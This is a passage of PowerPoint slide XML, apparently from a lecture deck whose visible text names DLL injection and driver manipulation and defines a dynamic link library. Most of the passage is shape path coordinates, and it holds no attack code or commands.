                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>goals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Ia</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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31511" y="306451"/>
            <a:ext cx="679323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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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5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dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Driver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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Manipulation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59479" y="760476"/>
            <a:ext cx="932535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45563" y="1933193"/>
            <a:ext cx="1156081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Dynamic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Link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Library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(DLL)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implements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some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function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multiple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processes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use.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229431" y="4712208"/>
            <a:ext cx="5749290" cy="3535679"/>
            <a:chOff x="5229431" y="4712208"/>
            <a:chExt cx="5749290" cy="3535679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5229431" y="5027961"/>
              <a:ext cx="5749290" cy="3220085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5749290" h="3220084">
                  <a:moveTo>
                    <a:pt x="2873676" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2845300" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781332" y="1862129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730449" y="1863153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679753" y="1864859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629243" y="1867249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578921" y="1870321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2528786" y="1874076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478838" y="1878514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429077" y="1883635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379503" y="1889440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330117" y="1895927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280918" y="1903098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231907" y="1910953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183083" y="1919491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134447" y="1928712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085998" y="1938617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037738" y="1949206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989665" y="1960479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941781" y="1972435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894084" y="1985076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846576" y="1998401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799256" y="2012410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738679" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726156" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711073" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696013" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1126886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673274" y="1144333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1159446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716579" y="2037556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667346" y="2052592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618414" y="2068297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569788" y="2084666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1521475" y="2101695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473481" y="2119378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425811" y="2137712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378472" y="2156693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331470" y="2176315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284810" y="2196576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238499" y="2217469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192542" y="2238991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146947" y="2261137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101718" y="2283904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056862" y="2307286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012384" y="2331279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968291" y="2355879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924589" y="2381081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881283" y="2406882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838381" y="2433276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795887" y="2460259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753807" y="2487828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712149" y="2515976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670917" y="2544701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630118" y="2573997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589757" y="2603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549841" y="2634287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510376" y="2665272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471368" y="2696812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432823" y="2728900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394746" y="2761535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357144" y="2794710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320023" y="2828421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283388" y="2862665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247247" y="2897436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211604" y="2932731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176465" y="2968545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141838" y="3004873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107727" y="3041712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74140" y="3079056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41080" y="3116902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8556" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6681" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22399" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34851" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49911" y="3219603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64994" y="3214305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77517" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108780" y="3168049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140581" y="3131125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172913" y="3094703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205769" y="3058786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239141" y="3023377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273024" y="2988480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307410" y="2954096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342292" y="2920228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377663" y="2886881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413517" y="2854055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449846" y="2821755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486643" y="2789984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523902" y="2758743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561616" y="2728036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599777" y="2697867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638379" y="2668237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677415" y="2639149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716877" y="2610607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756760" y="2582613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797055" y="2555171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837757" y="2528283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878857" y="2501951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920350" y="2476180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962228" y="2450971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004485" y="2426328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047112" y="2402254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090105" y="2378750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133454" y="2355821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177155" y="2333469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221199" y="2311698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265580" y="2290509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310290" y="2269905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355324" y="2249891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400673" y="2230468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446331" y="2211639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492292" y="2193408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538547" y="2175776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585091" y="2158748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631916" y="2142326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679016" y="2126512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726382" y="2111310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774010" y="2096723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821890" y="2082753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870018" y="2069403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1918385" y="2056677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1966985" y="2044576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015810" y="2033104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064855" y="2022265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114111" y="2012059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163573" y="2002492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213232" y="1993565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263083" y="1985281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2313118" y="1977643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2363330" y="1970654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413712" y="1964318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464258" y="1958636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514961" y="1953611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2565812" y="1949248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2616807" y="1945548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667937" y="1942514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719196" y="1940149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770577" y="1938456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822073" y="1937439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676" y="1937099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925100" y="1937428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976382" y="1938415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027517" y="1940056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078498" y="1942349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3129320" y="1945291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179979" y="1948878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3230468" y="1953110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3280782" y="1957982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330917" y="1963492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3380865" y="1969637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430623" y="1976415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480184" y="1983822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3529543" y="1991856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578695" y="2000515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627634" y="2009795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3676355" y="2019694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3724852" y="2030208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3773121" y="2041336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821155" y="2053075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3868949" y="2065421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3916498" y="2078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963796" y="2091925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010839" y="2106078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057620" y="2120828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4104134" y="2136171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150376" y="2152106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196340" y="2168630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242021" y="2185739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287413" y="2203431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332511" y="2221704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4377310" y="2240554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4421805" y="2259978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4465989" y="2279975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509857" y="2300541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4553405" y="2321674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4596626" y="2343370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639515" y="2365628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4682066" y="2388444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4724275" y="2411815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4766136" y="2435739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4807644" y="2460213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4848792" y="2485235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4889576" y="2510801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929991" y="2536909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4970030" y="2563556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5009688" y="2590739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5048961" y="2618456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5087842" y="2646704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5126326" y="2675480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5164408" y="2704781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5202082" y="2734605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5239343" y="2764949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5276185" y="2795809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5312604" y="2827184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5348593" y="2859071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5384147" y="2891467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5419262" y="2924369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5453930" y="2957774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5488148" y="2991679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5521909" y="3026083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5555208" y="3060982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5588040" y="3096373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5620399" y="3132254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5652280" y="3168621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5683678" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5686038" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5692267" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701091" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5711237" y="3218033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5713597" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5719826" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5728650" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5749083" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3173691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5706736" y="3116873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5674140" y="3079049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5641014" y="3041772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5607366" y="3005045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5573202" y="2968868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5538529" y="2933242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5503355" y="2898170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5467686" y="2863652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5431529" y="2829689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5394892" y="2796283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5357780" y="2763434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5320203" y="2731145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282165" y="2699417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5243675" y="2668250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5204739" y="2637646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5165364" y="2607606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5125558" y="2578131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5085327" y="2549224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5044678" y="2520884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5003618" y="2493113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4962154" y="2465913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4920294" y="2439284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4878044" y="2413228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4835411" y="2387747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792402" y="2362841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4749024" y="2338511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4705284" y="2314760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661190" y="2291588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616747" y="2268996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571964" y="2246985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4526847" y="2225558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4481402" y="2204715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4435638" y="2184457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4389561" y="2164786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4343178" y="2145703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296496" y="2127209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4249521" y="2109306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4202262" y="2091994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4154725" y="2075275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1154142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198125" y="1139618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1125118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5169237" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5153326" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5137415" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5118909" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4072048" y="2050129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4025104" y="2034102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3977711" y="2018789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3929891" y="2004188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881664" y="1990300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3833049" y="1977125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3784068" y="1964663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3734741" y="1952913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685088" y="1941876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3635128" y="1931552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3584884" y="1921940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534374" y="1913040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483619" y="1904852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3432639" y="1897377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381455" y="1890615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330087" y="1884564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278555" y="1879225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3226880" y="1874599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175081" y="1870684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123180" y="1867481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3071196" y="1864990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019150" y="1863211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967061" y="1862144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902053" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676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526024" y="4712207"/>
              <a:ext cx="5156200" cy="1858010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="743712" y="1383030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1336103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1290916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1247813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1207147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1169289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1134554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1103325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1075931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1052728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1034084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1020318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1011809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1008888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1011809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1020318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1034084"/>
                  </a:lnTo>
                  <a:lnTo>
